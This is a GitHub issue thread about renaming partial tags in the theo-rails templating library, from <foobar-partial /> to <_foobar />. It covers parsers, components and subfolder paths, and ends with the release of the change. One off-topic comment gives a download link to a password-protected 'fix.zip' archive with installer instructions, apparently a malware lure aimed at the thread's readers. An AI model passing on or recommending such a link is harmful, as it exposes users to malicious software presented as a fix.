### ISSUE TITLE
Suggested new partial name: <_foobar /> instead of <foobar-partial />

### ISSUE THREAD

**Issue by DanielJackson-Oslo** [loomchild/theo-rails#2]
The partial lives in a file starting with underscore, e.g. `_foobar.html.erb`, so we could use that convention and render partials with `_PARTIALNAME` instead of `PARTIALNAME_partial` 

Strengths: 

1. Shorter. `<_foobar />` vs `<foobar-partial />` 
2. Keeps conventions from Rails, so might still be easy to remember
3. Puts the information that this is a custom Rails partial up front, instead of at the back, makes it easier to scan which of these are partials and not:

Here's a contrived example, with two partials and one JS custom element (not a partial) intermixing:

With foobar_partial:

 ```
 <header_partial color%="color">
   <foldable-element>
     <h1_partial>Foobar!</h1_partial>
   </foldable-element>
</header_partial>
 ```
 
 With _foobar:
 
 ```
  <_header color%="color">
   <foldable-element>
     <_h1>Foobar!</_h1>
   </foldable-element>
</_header>
 ```
 
 Weakness:
 
1. Breaks existing HTML parsers for syntax highlighting, like here on Github

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DanielJackson-Oslo** [comment]
Another weakness: Harder to implement other renders, like the upcoming "<foobar-component>"

**Comment by loomchild** [comment]
Thanks again for posting this, I will evaluate it ASAP (next week/weekend).

**Comment by loomchild** [comment]
@DanielJackson-Oslo Sorry for a long wait - I had a crazy couple of weeks with work and moving to another country region.

I like your suggestion and I'll try to implement it.

As for components - I think I can simply check if the component exists via `defined?(MyComponent)` to decide how to treat it, or add an explicit `component` attribute if needed.

For parsers - well, they need to adapt to Theo;) And my vim doesn't highlight the templates anyway, but recognizes them as tags so formatting works.

**Comment by DanielJackson-Oslo** [comment]
> @DanielJackson-Oslo Sorry for a long wait - I had a crazy couple of weeks with work and moving to another country region.
> 

No worries! I absolutely love what you are doing here, and with two small kids my life is full of interruptions and delays too :)


> I like your suggestion and I'll try to implement it.
> 

Very cool! Looking forward to trying it out :)

> As for components - I think I can simply check if the component exists via `defined?(MyComponent)` to decide how to treat it, or add an explicit `component` attribute if needed.

Checking for it and having it just work definitely feels more railsy. 

One concern: I often have partials in subfolders and have to refer to them by folder path, eg. 

```
render "dashboard/map/controls" 
```

Would that simply be 

```
<_dashboard/map/controls />
```

?

**Comment by loomchild** [comment]
No, currently there's a [`path` attribute](https://github.com/loomchild/theo-rails?tab=readme-ov-file#path), so it looks like:

`<_controls path="dashboard/map" />`

But again, I am open for suggestions.

**Comment by loomchild** [comment]
Changed and released in `0.2.0` (breaking change, but lib is experimental so hopefully not a problem for anyone)
